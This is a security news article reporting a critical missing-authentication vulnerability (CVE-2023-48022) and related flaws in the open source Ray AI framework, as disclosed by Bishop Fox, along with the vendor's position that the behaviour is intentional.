Artificial Intelligence

Critical Vulnerability Found in Ray AI Framework 

A critical issue in open source AI framework Ray could provide attackers with operating system access to all nodes.

A critical issue in open source AI framework Ray could provide attackers with operating system access to all nodes.

A critical vulnerability in Ray, an open source compute framework for AI, could allow unauthorized access to all nodes, cybersecurity firm Bishop Fox warns.

Tracked as CVE-2023-48022, the bug exists because Ray does not properly enforce authentication on at least two of its components, namely the dashboard and client.

A remote attacker can abuse this issue to submit or delete jobs without authentication. Furthermore, the attacker could retrieve sensitive information and execute arbitrary code, Bishop Fox says.

“The vulnerability could be exploited to obtain operating system access to all nodes in the Ray cluster or attempt to retrieve Ray EC2 instance credentials (in a typical AWS cloud install),” the cybersecurity firm notes.

CVE-2023-48022 is rooted in the fact that, in its default configuration, Ray does not enforce authentication, and does not appear to support any type of authorization model, although an optional mutual TLS authentication mode is described in the framework’s documentation.

“In other words, even if a Ray administrator explicitly enabled TLS authentication, they would be unable to grant users different permissions, such as read-only access to the Ray dashboard,” Bishop Fox says.

According to the cybersecurity firm, attackers could exploit CVE-2023-48022 via the job submission API, by submitting arbitrary operating system commands.

Ray’s lack of authentication leads to other security vulnerabilities, including issues that were recently disclosed by Protect AI, which manages Huntr, the bug bounty platform for AI and ML.

Advertisement. Scroll to continue reading.

Bishop Fox says it independently identified two of these issues and reported them to Ray’s maintainers (Anyscale) around the same time as Protect AI.

“However, the reports were closed based on Anyscale’s position that unauthenticated remote code execution is intentional, and therefore should not be considered a vulnerability,” the cybersecurity firm says.

Furthermore, the company says, the Ray jobs Python SDK can be used for unauthenticated, remote code execution, by crafting a malicious script, using the Ray API for task submission. The Ray client API can also be abused for unauthenticated remote code execution.

Bishop Fox draws attention to other critical-severity vulnerabilities in Ray as well, including a server-side request forgery (SSRF) bug (CVE-2023-48023) and an insecure input validation flaw (CVE-2023-6021) that Protect AI reported to the vendor this summer.

At least some of these issues, the cybersecurity firm notes, remain unpatched, as the vendor either does not recognize them as security defects or does not want to address them.

Update: The CVE IDs for the missing authentication and SSRF vulnerabilities have been corrected after learning that Bishop Fox swapped them in their initial post.

Related: OpenAI Patches Account Takeover Vulnerabilities in ChatGPT

Related: US, UK Cybersecurity Agencies Publish AI Development Guidance

Related: CISA Outlines AI-Related Cybersecurity Efforts

Related Content

Artificial Intelligence

When not scamming other criminals, criminals are concentrating on the use of mainstream AI products rather than developing their own AI systems.

Vulnerabilities

CISA’s Vulnrichment project is adding important information to CVE records to help improve vulnerability management processes.

Vulnerabilities

F5 has patched two potentially serious vulnerabilities in BIG-IP Next that could allow an attacker to take full control of a device.

Vulnerabilities

CISA and the FBI warn of threat actors abusing path traversal software vulnerabilities in attacks targeting critical infrastructure.

Mobile & Wireless

Microsoft has uncovered a new type of attack called Dirty Stream that impacted Android apps with billions of installations. 

Artificial Intelligence

Israeli AI security firm Apex has received $7 million in seed funding for its detection, investigation, and response platform.

Artificial Intelligence

Japan's Prime Minister unveiled an international framework for regulation and use of generative AI, adding to global efforts on governance for the rapidly advancing...

Artificial Intelligence

AI-Native Trust, Risk, and Security Management (TRiSM) startup DeepKeep raises $10 million in seed funding.

Copyright © 2024 SecurityWeek ®, a Wired Business Media Publication. All Rights Reserved.

Exit mobile version